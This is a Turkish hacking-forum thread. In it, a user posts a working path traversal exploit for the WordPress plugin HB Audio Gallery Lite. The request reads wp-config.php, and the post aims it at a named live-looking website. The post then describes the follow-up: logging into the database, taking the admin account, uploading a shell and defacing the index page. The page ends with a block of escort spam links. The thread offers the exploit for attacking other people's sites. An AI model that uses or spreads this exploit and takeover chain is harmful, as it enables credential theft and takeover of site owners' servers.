Wordpress Plugin HB Audio Gallery Lite Açığı

SkullZ

Forumdan Uzaklaştırıldı
Katılım
6 Mar 2016
Mesajlar
154
Tepkime puanı
0
Puanları
0
Bugün sizlere Wordpress Plugin HB Audio Gallery Lite açığını göstereceğim;

Google Dork:
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!

Vuln Dosya: gallery/audio-download.php

Exploit: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Örneğin;
frenchandindianwarfoundation.org/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Config'i çektikten sonra ne yapacağınızı bilmiyorsanız ?
Nacivat yardımı ile sitenin veritabanına giriyoruz veya phpmyadmin'e girebilirseniz o da olur. Daha sonra veritabanından userleri buluyoruz ve admini giriyoruz. İşlem bu kadardır. daha sonrası shell ve index. :D
 

LastHacker

Spys-Z
Katılım
26 Tem 2015
Mesajlar
509
Tepkime puanı
0
Puanları
0
Yaş
26
Web sitesi
frmjoker.com
Bakalım
 

sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort mersin escort mersin web tasarım bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol puff izmit escort izmit escort
Üst
Copyright® Ajanlar.org 2012